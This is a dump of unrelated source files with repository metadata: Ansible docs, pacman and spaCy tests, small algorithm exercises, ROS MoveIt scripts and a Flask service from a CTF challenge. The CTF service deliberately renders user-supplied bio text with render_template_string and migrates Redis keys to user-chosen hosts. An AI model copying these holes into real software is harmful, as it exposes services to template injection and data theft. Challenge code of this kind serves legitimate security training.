suboptions:
host:
description:
- Specifies the DNS host name or address for connecting to the remote
instance of NIOS WAPI over REST
- Value can also be specified using C(INFOBLOX_HOST) environment
variable.
type: str
required: true
username:
description:
- Configures the username to use to authenticate the connection to
the remote instance of NIOS.
- Value can also be specified using C(INFOBLOX_USERNAME) environment
variable.
type: str
password:
description:
- Specifies the password to use to authenticate the connection to
the remote instance of NIOS.
- Value can also be specified using C(INFOBLOX_PASSWORD) environment
variable.
type: str
validate_certs:
description:
- Boolean value to enable or disable verifying SSL certificates
- Value can also be specified using C(INFOBLOX_SSL_VERIFY) environment
variable.
type: bool
default: no
aliases: [ ssl_verify ]
http_request_timeout:
description:
        - The amount of time to wait before receiving a response
- Value can also be specified using C(INFOBLOX_HTTP_REQUEST_TIMEOUT) environment
variable.
type: int
default: 10
max_retries:
description:
        - Configures the number of attempted retries before the connection
          is declared unusable
- Value can also be specified using C(INFOBLOX_MAX_RETRIES) environment
variable.
type: int
default: 3
wapi_version:
description:
- Specifies the version of WAPI to use
- Value can also be specified using C(INFOBLOX_WAP_VERSION) environment
variable.
- Until ansible 2.8 the default WAPI was 1.4
type: str
default: '2.1'
max_results:
description:
- Specifies the maximum number of objects to be returned,
if set to a negative number the appliance will return an error when the
number of returned objects would exceed the setting.
- Value can also be specified using C(INFOBLOX_MAX_RESULTS) environment
variable.
type: int
default: 1000
notes:
- "This module must be run locally, which can be achieved by specifying C(connection: local)."
- Please read the :ref:`nios_guide` for more detailed information on how to use Infoblox with Ansible.
'''
| 35.809524 | 104 | 0.635306 |
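The provider suboptions documented above all fall back to environment variables. A minimal sketch of that resolution logic, assuming a hypothetical helper name (this illustrates the documented fallback behaviour only, it is not the actual module_utils code used by the NIOS modules):

import os

def resolve_provider(provider):
    # each connection detail falls back to its documented env variable
    env_fallbacks = {
        'host': 'INFOBLOX_HOST',
        'username': 'INFOBLOX_USERNAME',
        'password': 'INFOBLOX_PASSWORD',
    }
    resolved = dict(provider or {})
    for key, env_name in env_fallbacks.items():
        if resolved.get(key) is None and env_name in os.environ:
            resolved[key] = os.environ[env_name]
    return resolved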
8268e3ff708fceac06d057f89101a1b211a8db3a
| 364 |
py
|
Python
|
pacman-arch/test/pacman/tests/upgrade084.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade084.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade084.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Install a package ('any' architecture)"
p = pmpkg("dummy")
p.files = ["bin/dummy",
"usr/man/man1/dummy.1"]
p.arch = 'any'
self.addpkg(p)
self.option["Architecture"] = ['auto']
self.args = "-U %s" % p.filename()
self.addrule("PACMAN_RETCODE=0")
self.addrule("PKG_EXIST=dummy")
for f in p.files:
self.addrule("FILE_EXIST=%s" % f)
| 21.411765 | 59 | 0.648352 |
c4e5c92095ff07343908dc4ad5fe4a10a7b5ac03
| 498 |
pyde
|
Python
|
sketches/noll/noll.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/noll/noll.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/noll/noll.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
from random import randint
margin = 5
def setup():
size(400, 600)
this.surface.setTitle("Re-Enactment A. Michael Noll")
noLoop()
def draw():
background(235, 215, 182)
strokeWeight(2)
x1 = randint(margin, width - margin)
y1 = randint(margin, height - margin)
for _ in range(50):
x2 = randint(margin, width - margin)
y2 = randint(margin, height - margin)
line(x1, y1, x1, y2)
line(x1, y2, x2, y2)
x1 = x2
y1 = y2
| 22.636364 | 57 | 0.574297 |
f219263481489e692def3950e22f5330890ee7b8
| 476 |
py
|
Python
|
exercises/fr/test_01_09.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/fr/test_01_09.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/fr/test_01_09.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
def test():
assert "for ent in doc.ents" in __solution__, "Itères-tu sur les entités ?"
assert x_pro.text == "X Pro", "Es-tu certain que x_pro contient les bons tokens ?"
__msg__.good(
"Parfait ! Bien sur, tu n'as pas besoin de faire cela manuellement à chaque fois."
"Dans le prochain exercice, tu vas découvrir le matcher à base de règles de spaCy, "
"qui peut t'aider à trouver des mots et des phrases spécifiques dans un texte."
)
| 47.6 | 92 | 0.676471 |
96b888fef4eb174221ced8eecdc0b4280bce51d8
| 3,932 |
py
|
Python
|
handledata.py
|
bioPunkKitchen/climate.local
|
ccd29da3d84542d5f9c73a5d75bc3ceefeef1f08
|
[
"MIT"
] | 1 |
2019-05-28T18:33:49.000Z
|
2019-05-28T18:33:49.000Z
|
handledata.py
|
bioPunkKitchen/climate.local
|
ccd29da3d84542d5f9c73a5d75bc3ceefeef1f08
|
[
"MIT"
] | 1 |
2019-12-30T14:52:02.000Z
|
2020-01-04T11:41:08.000Z
|
handledata.py
|
bioPunkKitchen/climate.local
|
ccd29da3d84542d5f9c73a5d75bc3ceefeef1f08
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import datetime
import time
import os
import matplotlib.pyplot as plt
import matplotlib.dates as md
import numpy as np
class handle_data:
data_file = "./data/data.log"
data_list = []
def __init__(self):
pass
def insert_data(self, timestamp, temp, state_onoff, state_light, state_cooling, state_heating):
"""
Insert data to log file and add timestamp.
"""
if state_onoff == 'on':
state_onoff = 1
else:
state_onoff = 0
if state_light == 'on':
state_light = 1
else:
state_light = 0
if state_cooling == 'on':
state_cooling = 1
else:
state_cooling = 0
if state_heating == 'on':
state_heating = 1
else:
state_heating = 0
data_string = str(timestamp) + ";" + str(temp) + ";" + str(state_onoff) + ";" + str(state_light) + ";" + str(state_cooling) + ";" + str(state_heating) + "\n"
self.data_list.append(data_string)
#print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tInserted data: data_list.append len=", len(self.data_list))
return
def append_data_to_file(self):
"""
Append data to log file.
"""
try:
with open(self.data_file, "a") as outfile:
for entry in self.data_list:
outfile.write(str(entry))
except IOError:
print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tIOError opening data.log for appending data")
self.data_list.clear()
return
def clean_file(self):
"""
Clean log file in order to reset measurement.
"""
try:
with open(self.data_file, "w") as outfile:
outfile.write("Timestamp; Temp; State_onoff; State_light; State_cooling; State_heating\n")
except IOError:
print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tIOError opening data.log for writing")
return
def update_graph(self, path):
"""
Generate or update graph from data file.
"""
        with open(self.data_file) as f:
            lines = sum(1 for _ in f)
if lines > 1:
data=np.genfromtxt(self.data_file, delimiter=';', skip_header=1, names=['Time', 'Temp', 'Onoff', 'Light', 'Cooling', 'Heating'], dtype=([('Time', '<U30'), ('Temp', '<f8'), ('Onoff', '<f8'), ('Light', '<f8'), ('Cooling', '<f8'), ('Heating', '<f8')]))
fig, ax1 = plt.subplots()
if data['Temp'].shape:
if data['Temp'].shape[0] > 120:
ax1.plot(data['Temp'][((data['Temp'].shape[0])-120):(data['Temp'].shape[0])], color = 'r', label = 'Temp.')
else:
ax1.plot(data['Temp'], color = 'r', label = 'Temp.')
else:
ax1.plot(data['Temp'], color = 'r', label = 'Temp.')
ax1.set_xlim([0,120])
ax1.set_xticks([0,30,60,90,120])
ax1.set_ylabel('Temp (°C)', color='r')
ax1.tick_params('y', colors='r')
            yt = range(-1, 41, 1)
ax1.set_yticks(yt, minor=True)
ax1.set_xlabel('last two hours (scale:min.)')
"""
ax2 = ax1.twinx()
ax2.plot(data['Light'], color = 'g', label = 'Light', marker = 'o')
ax2.plot(data['Onoff'], color = 'y', label = 'Onoff', marker = '*')
ax2.plot(data['Heating'], color = 'r', label = 'Heating')
ax2.plot(data['Cooling'], color = 'b', label = 'Cooling')
ax2.set_ylabel('Light (on=1/off=0)', color='b')
ax2.tick_params('y', colors='b')
ax2.set_yticks([0,1], minor=False)
"""
fig.tight_layout()
#plt.legend(['Temp. inside'], loc='upper left')
plt.savefig(path, bbox_inches='tight')
plt.close(fig)
print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tGraph generated/updated.")
else:
#os.remove(path)
#os.mknod(path)
#os.chmod(path, 0o644)
try:
with open(path, "w") as outfile:
outfile.write("")
except IOError:
print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tIOError: Could not generate empty graph file.")
print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tNo data, graph is empty.")
return
# Test:
if __name__ == '__main__':
hd = handle_data()
#hd.clean_file()
hd.update_graph('./static/data_log.png')
| 30.015267 | 252 | 0.625127 |
73722b13a366409a78c447bdbc55cbb010f2c490
| 568 |
py
|
Python
|
src/visuanalytics/tests/analytics/transform/transform_test_helper.py
|
mxsph/Data-Analytics
|
c82ff54b78f50b6660d7640bfee96ea68bef598f
|
[
"MIT"
] | 3 |
2020-08-24T19:02:09.000Z
|
2021-05-27T20:22:41.000Z
|
src/visuanalytics/tests/analytics/transform/transform_test_helper.py
|
mxsph/Data-Analytics
|
c82ff54b78f50b6660d7640bfee96ea68bef598f
|
[
"MIT"
] | 342 |
2020-08-13T10:24:23.000Z
|
2021-08-12T14:01:52.000Z
|
src/visuanalytics/tests/analytics/transform/transform_test_helper.py
|
visuanalytics/visuanalytics
|
f9cce7bc9e3227568939648ddd1dd6df02eac752
|
[
"MIT"
] | 8 |
2020-09-01T07:11:18.000Z
|
2021-04-09T09:02:11.000Z
|
from visuanalytics.analytics.control.procedures.step_data import StepData
from visuanalytics.analytics.transform.transform import transform
def prepare_test(values: list, data, expected_data: dict, config=None):
if config is None:
config = {}
step_data = StepData(config, "0", 0)
step_data.insert_data("_req", data, {})
transform({"transform": values}, step_data)
    # remove the temporarily set helper entries
step_data.data.pop("_conf")
step_data.data.pop("_pipe_id")
step_data.data.pop("_job_id")
return step_data.data, expected_data
| 29.894737 | 73 | 0.721831 |
83b9dae35ff849de97a8ab5c1b5b328eee4bf2a8
| 517 |
py
|
Python
|
08.Graph/Kruskal.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | 1 |
2021-11-21T06:03:06.000Z
|
2021-11-21T06:03:06.000Z
|
08.Graph/Kruskal.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | 2 |
2021-10-13T07:21:09.000Z
|
2021-11-14T13:53:08.000Z
|
08.Graph/Kruskal.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | null | null | null |
def pprint(arr):
for line in arr:
print(line)
# 5 7
# 0 1 1
# 0 2 3
# 1 2 3
# 1 3 6
# 2 3 4
# 2 4 2
# 3 4 5
import sys
import heapq as hq
N, M = map(int, sys.stdin.readline().split(" "))
W = [[float('inf')] * N for _ in range(N)]
h = []
for _ in range(M):
i, j, w = map(int, sys.stdin.readline().split(" "))
hq.heappush(h, (w, i, j))
print(h)
def Kruskal(heap, source):
    # pop edges in increasing weight order and keep an edge whenever it
    # joins two different union-find components (path-compressed find)
    parent = list(range(N))
    def find(x):
        if parent[x] != x:
            parent[x] = find(parent[x])
        return parent[x]
    answer = []
    while heap:
        w, i, j = hq.heappop(heap)
        ri, rj = find(i), find(j)
        if ri != rj:
            parent[ri] = rj
            answer.append((i, j, w))
    return answer
print(Kruskal(h, 0))
| 16.15625 | 55 | 0.537718 |
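For the sample edge list given in the comments above (5 vertices, 7 edges), the repaired Kruskal walk keeps four edges. A minimal standalone check, assuming N = 5; the expected result below is worked out by hand, not taken from the original file:

import heapq as hq
N = 5
h = []
for i, j, w in [(0, 1, 1), (0, 2, 3), (1, 2, 3), (1, 3, 6), (2, 3, 4), (2, 4, 2), (3, 4, 5)]:
    hq.heappush(h, (w, i, j))
# Kruskal(h, 0) -> [(0, 1, 1), (2, 4, 2), (0, 2, 3), (2, 3, 4)], total weight 10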
83e3deec67e89aa7e42ab0f38a20a3246b563ad9
| 1,551 |
py
|
Python
|
official/cv/ADNet/export_model.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/ADNet/export_model.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/ADNet/export_model.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import argparse
import numpy as np
from src.options.general import opts
from src.models.ADNet import adnet
from mindspore import Tensor, export, context
parser = argparse.ArgumentParser(
description='ADNet test')
parser.add_argument('--weight_file', default='', type=str, help='The pretrained weight file')
parser.add_argument('--device_target', type=str, default="Ascend", choices=['Ascend', 'GPU', 'CPU'])
parser.add_argument('--target_device', type=int, default=0)
args = parser.parse_args()
context.set_context(device_target=args.device_target, mode=context.PYNATIVE_MODE, device_id=args.target_device)
opts['num_videos'] = 1
net, domain_specific_nets = adnet(opts, trained_file=args.weight_file)
input_ = np.random.uniform(0.0, 1.0, size=[128, 3, 112, 112]).astype(np.float32)
export(net, Tensor(input_), file_name='ADNet', file_format='MINDIR')
print('export finished')
| 43.083333 | 111 | 0.728562 |
86024a0f256f012bd58b4d8e9b5de4b21cc1702d
| 1,024 |
py
|
Python
|
stat_ip_in_hash_woker_table.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
stat_ip_in_hash_woker_table.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
stat_ip_in_hash_woker_table.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
def sortedDict(adict):
keys = adict.keys()
keys.sort()
return map(adict.get, keys)
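# dotted-quad <-> 32-bit integer converters, e.g.
# ipint2str(3232235777) == '192.168.1.1' and ipstr2int('192.168.1.1') == 3232235777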
ipint2str = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)])
ipstr2int = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])])
src_ip = dict()
dst_ip = dict()
i = 0
with open('hash_key_value') as f:
for line in f:
i += 1
# if i==8424720:
if i==328:
break
ip = int(line.split(',')[0], 16)
dir = int(line.split(',')[1])
        if dir == 1:
            src_ip.setdefault(ip, dir)
        elif dir == 0:
            dst_ip.setdefault(ip, dir)
print len(src_ip)
for key in src_ip:
print ipint2str(key)+' ' ,
print '======='
print len(dst_ip)
for key in dst_ip:
print ipint2str(key)+' ' ,
# keys = src_ip.items()
# keys.sort()
# for key in keys:
# print ipint2str(key[0])
# keys = dst_ip.items()
# keys.sort()
# for key in keys:
# print ipint2str(key[0])
| 20.078431 | 82 | 0.512695 |
860663bf7fc7f279ff0aaf05a3df989c0b80600b
| 2,431 |
py
|
Python
|
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex07_water_jugs.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex07_water_jugs.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex07_water_jugs.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
# Example program for the book "Python Challenge"
#
# Copyright 2020 by Michael Inden
def solve_water_jugs(size1, size2, desired_liters):
return __solve_water_jugs_rec(size1, size2,
desired_liters, 0, 0, {})
def __solve_water_jugs_rec(size1, size2, desired_liters,
current_jug1, current_jug2, already_tried):
if is_solved(current_jug1, current_jug2, desired_liters):
print("Solved Jug 1:", current_jug1, " / 2:", current_jug2)
return True
key = (current_jug1, current_jug2)
    if key not in already_tried:
already_tried[key] = True
        # try all 6 pouring variants
print("Jug 1:", current_jug1, " / 2: ", current_jug2)
min_2_1 = min(current_jug2, (size1 - current_jug1))
min_1_2 = min(current_jug1, (size2 - current_jug2))
result = __solve_water_jugs_rec(size1, size2, desired_liters,
0, current_jug2, already_tried) or \
__solve_water_jugs_rec(size1, size2, desired_liters,
current_jug1, 0, already_tried) or \
__solve_water_jugs_rec(size1, size2, desired_liters,
size1, current_jug2, already_tried) or \
__solve_water_jugs_rec(size1, size2, desired_liters,
current_jug1, size2, already_tried) or \
__solve_water_jugs_rec(size1, size2, desired_liters,
current_jug1 + min_2_1,
current_jug2 - min_2_1,
already_tried) or \
__solve_water_jugs_rec(size1, size2, desired_liters,
current_jug1 - min_1_2,
current_jug2 + min_1_2,
already_tried)
# Memoization:
already_tried[key] = result
return result
return False
def is_solved(current_jug1, current_jug2, desired_liters):
return (current_jug1 == desired_liters and current_jug2 == 0) or \
(current_jug2 == desired_liters and current_jug1 == 0)
def main():
print(solve_water_jugs(4, 3, 2))
print(solve_water_jugs(4, 4, 2))
    #print(solve_water_jugs(5, 2, 4))
if __name__ == "__main__":
main()
| 37.4 | 80 | 0.559441 |
860804e29db65321937c10951cae50769822d370
| 641 |
py
|
Python
|
1014 Trie Tree/test.py
|
SLAPaper/hihoCoder
|
3f64d678c5dd46db36345736eb56880fb2d2c5fe
|
[
"MIT"
] | null | null | null |
1014 Trie Tree/test.py
|
SLAPaper/hihoCoder
|
3f64d678c5dd46db36345736eb56880fb2d2c5fe
|
[
"MIT"
] | null | null | null |
1014 Trie Tree/test.py
|
SLAPaper/hihoCoder
|
3f64d678c5dd46db36345736eb56880fb2d2c5fe
|
[
"MIT"
] | null | null | null |
# generate 100k random words and 100k random queries to test the runtime
from main import TrieTree
import time
import random
vocal = list(range(26))
trie = TrieTree()
words = [[random.choice(vocal) for _ in range(random.randrange(1, 11))] for _ in range(100000)]
queries = [[random.choice(vocal) for _ in range(random.randrange(1, 11))] for _ in range(100000)]
begin = time.time()
for word in words:
trie.insert(word)
insert_end = time.time()
for query in queries:
trie.query(query)
end = time.time()
print("insert time used:", insert_end - begin, 's')
print("query time used:", end - insert_end, 's')
print("time used:", end - begin, 's')
| 22.103448 | 97 | 0.692668 |
f7ff646590489831f35fa9fe7ca9c0fe9f2f76be
| 592 |
py
|
Python
|
ProjectEuler_plus/euler_042.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_042.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_042.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
from math import sqrt
# A triangular number t satisfies t = n * (n + 1) / 2, i.e. n ** 2 + n - 2 * t = 0.
# Solving that quadratic for n gives n = (sqrt(8 * t + 1) - 1) / 2, so t is
# triangular exactly when sqrt(8 * t + 1) - 1 is an even integer.
# https://en.wikipedia.org/wiki/Quadratic_equation
for _ in range(int(input().strip())):
t = int(input().strip())
d = (sqrt(4 * 2 * t + 1) - 1)
if d.is_integer():
print(int(d) // 2)
else:
print(-1)
def e42():
for _ in range(int(input().strip())):
n = int(input().strip())
root = int(sqrt(2 * n))
if (root * (root + 1)) // 2 == n:
print(root)
else:
print(-1)
| 21.925926 | 52 | 0.489865 |
79181888e71b95f21231a74673bce1df5f5dad06
| 1,058 |
py
|
Python
|
jburt/mask.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
jburt/mask.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
jburt/mask.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
from typing import List
import numpy as np
def mask_nan(arrays: List[np.ndarray]) -> List[np.ndarray]:
"""
Drop indices from equal-sized arrays if the element at that index is NaN in
any of the input arrays.
Parameters
----------
arrays : List[np.ndarray]
list of ndarrays containing NaNs, to be masked
Returns
-------
List[np.ndarray]
masked arrays (free of NaNs)
Notes
-----
This function find the indices where one or more elements is NaN in one or
more of the input arrays, then drops those indices from all arrays.
For example:
>> a = np.array([0, 1, np.nan, 3])
>> b = np.array([np.nan, 5, np.nan, 7])
>> c = np.array([8, 9, 10, 11])
>> mask_nan([a, b, c])
[array([ 1., 3.]), array([ 5., 7.]), array([ 9, 11])]
"""
n = arrays[0].size
assert all(a.size == n for a in arrays[1:])
mask = np.array([False] * n)
for arr in arrays:
mask = np.logical_or(mask, np.isnan(arr))
return [arr[np.where(~mask)[0]] for arr in arrays]
| 27.128205 | 79 | 0.581285 |
e3eb6d0f0d638a2beae2a17150b8764d8ef995b7
| 2,946 |
py
|
Python
|
vb_simulation_pkgs/example_pkgs/pkg_moveit_examples/scripts/node_eg2_predefined_pose.py
|
ROBODITYA/Eyantra-2021-Vargi-Bots
|
f1c6a82c46e6e84486a4832b3fbcd02625849447
|
[
"MIT"
] | 1 |
2021-07-13T07:05:29.000Z
|
2021-07-13T07:05:29.000Z
|
vb_simulation_pkgs/example_pkgs/pkg_moveit_examples/scripts/node_eg2_predefined_pose.py
|
TejasPhutane/Eyantra-2021-Vargi-Bots
|
ab84a1304101850be8c0f69cfe6de70d53c33189
|
[
"MIT"
] | 1 |
2021-06-05T07:58:03.000Z
|
2021-06-05T07:58:03.000Z
|
vb_simulation_pkgs/example_pkgs/pkg_moveit_examples/scripts/node_eg2_predefined_pose.py
|
ROBODITYA/Eyantra-2021-Vargi-Bots
|
f1c6a82c46e6e84486a4832b3fbcd02625849447
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
import rospy
import sys
import copy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
import actionlib
class Ur5Moveit:
# Constructor
def __init__(self, arg_robot_name):
rospy.init_node('node_eg2_predefined_pose', anonymous=True)
self._robot_ns = '/' + arg_robot_name
self._planning_group = "manipulator"
self._commander = moveit_commander.roscpp_initialize(sys.argv)
self._robot = moveit_commander.RobotCommander(robot_description= self._robot_ns + "/robot_description", ns=self._robot_ns)
self._scene = moveit_commander.PlanningSceneInterface(ns=self._robot_ns)
self._group = moveit_commander.MoveGroupCommander(self._planning_group, robot_description= self._robot_ns + "/robot_description", ns=self._robot_ns)
self._display_trajectory_publisher = rospy.Publisher( self._robot_ns + '/move_group/display_planned_path', moveit_msgs.msg.DisplayTrajectory, queue_size=1)
        self._execute_trajectory_client = actionlib.SimpleActionClient( self._robot_ns + '/execute_trajectory', moveit_msgs.msg.ExecuteTrajectoryAction)
        self._execute_trajectory_client.wait_for_server()
self._planning_frame = self._group.get_planning_frame()
self._eef_link = self._group.get_end_effector_link()
self._group_names = self._robot.get_group_names()
self._box_name = ''
# Current State of the Robot is needed to add box to planning scene
self._curr_state = self._robot.get_current_state()
        rospy.loginfo(
            '\033[94m' + "Planning Frame: {}".format(self._planning_frame) + '\033[0m')
rospy.loginfo(
'\033[94m' + "End Effector Link: {}".format(self._eef_link) + '\033[0m')
rospy.loginfo(
'\033[94m' + "Group Names: {}".format(self._group_names) + '\033[0m')
rospy.loginfo('\033[94m' + " >>> Ur5Moveit init done." + '\033[0m')
def go_to_predefined_pose(self, arg_pose_name):
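        # plan towards a named pose defined in the SRDF, then hand the
        # planned trajectory to the execute_trajectory action server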
rospy.loginfo('\033[94m' + "Going to Pose: {}".format(arg_pose_name) + '\033[0m')
self._group.set_named_target(arg_pose_name)
plan = self._group.plan()
goal = moveit_msgs.msg.ExecuteTrajectoryGoal()
goal.trajectory = plan
        self._execute_trajectory_client.send_goal(goal)
        self._execute_trajectory_client.wait_for_result()
rospy.loginfo('\033[94m' + "Now at Pose: {}".format(arg_pose_name) + '\033[0m')
# Destructor
def __del__(self):
moveit_commander.roscpp_shutdown()
rospy.loginfo(
'\033[94m' + "Object of class Ur5Moveit Deleted." + '\033[0m')
def main():
ur5 = Ur5Moveit(sys.argv[1])
while not rospy.is_shutdown():
ur5.go_to_predefined_pose("straightUp")
rospy.sleep(2)
ur5.go_to_predefined_pose("allZero")
rospy.sleep(2)
del ur5
if __name__ == '__main__':
main()
| 37.291139 | 163 | 0.681942 |
5414c4d1cd6ab405e144265b135b1ae64b919a77
| 2,596 |
py
|
Python
|
web/MicroservicesAsAservice/src/notes/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | null | null | null |
web/MicroservicesAsAservice/src/notes/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | null | null | null |
web/MicroservicesAsAservice/src/notes/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | null | null | null |
from flask import Flask, request, jsonify, render_template_string
import redis
import requests
import re
import json
import sys
app = Flask(__name__)
@app.route('/getid/<username>')
def getid(username):
red = redis.Redis(host="redis_users")
return red.get(username).decode()
@app.route('/useraction', methods=["POST"])
def useraction():
mode = request.form.get("mode")
username = request.form.get("username")
if mode == "register":
r = requests.get('http://redis_userdata:5000/adduser')
port = int(r.text)
red = redis.Redis(host="redis_users")
red.set(username, port)
return ""
elif mode == "adddata":
red = redis.Redis(host="redis_users")
port = red.get(username).decode()
requests.post(f"http://redis_userdata:5000/putuser/{port}", json={
request.form.get("key"): request.form.get("value")
})
return ""
elif mode == "getdata":
red = redis.Redis(host="redis_users")
port = red.get(username).decode()
r = requests.get(f"http://redis_userdata:5000/getuser/{port}")
return jsonify(r.json())
elif mode == "bioadd":
bio = request.form.get("bio")
bio = bio.replace(".", "").replace("_", "").\
replace("{", "").replace("}", "").\
replace("(", "").replace(")", "").\
replace("|", "")
bio = re.sub(r'\[\[([^\[\]]+)\]\]', r'{{data["\g<1>"]}}', bio)
red = redis.Redis(host="redis_users")
port = red.get(username).decode()
requests.post(f"http://redis_userdata:5000/bio/{port}", json={
"bio": bio
})
return ""
elif mode == "bioget":
red = redis.Redis(host="redis_users")
port = red.get(username).decode()
r = requests.get(f"http://redis_userdata:5000/bio/{port}")
return r.text
elif mode == "keytransfer":
red = redis.Redis(host="redis_users")
port = red.get(username).decode()
red2 = redis.Redis(host="redis_userdata",
port=int(port))
red2.migrate(request.form.get("host"),
request.form.get("port"),
[request.form.get("key")],
0, 1000,
copy=True, replace=True)
return ""
@app.route("/render", methods=["POST"])
def render_bio():
data = request.json.get('data')
if data is None:
data = {}
return render_template_string(request.json.get('bio'), data=data)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
| 33.282051 | 74 | 0.552003 |
58183b1abecb86537c0a52b35966e7d8ef3e9a5f
| 5,775 |
py
|
Python
|
Agent5_a_0_5_knots_512_d_0_02/step_node_Agent6_rewards.py
|
schigeru/Bachelorarbeit_Code
|
261b2552221f768e7022abc60a4e5a7d2fedbbae
|
[
"MIT"
] | null | null | null |
Agent5_a_0_5_knots_512_d_0_02/step_node_Agent6_rewards.py
|
schigeru/Bachelorarbeit_Code
|
261b2552221f768e7022abc60a4e5a7d2fedbbae
|
[
"MIT"
] | null | null | null |
Agent5_a_0_5_knots_512_d_0_02/step_node_Agent6_rewards.py
|
schigeru/Bachelorarbeit_Code
|
261b2552221f768e7022abc60a4e5a7d2fedbbae
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import math
import os
import numpy as np
import time
import sys
import copy
import rospy
import moveit_msgs.msg
import geometry_msgs.msg
import random
import csv
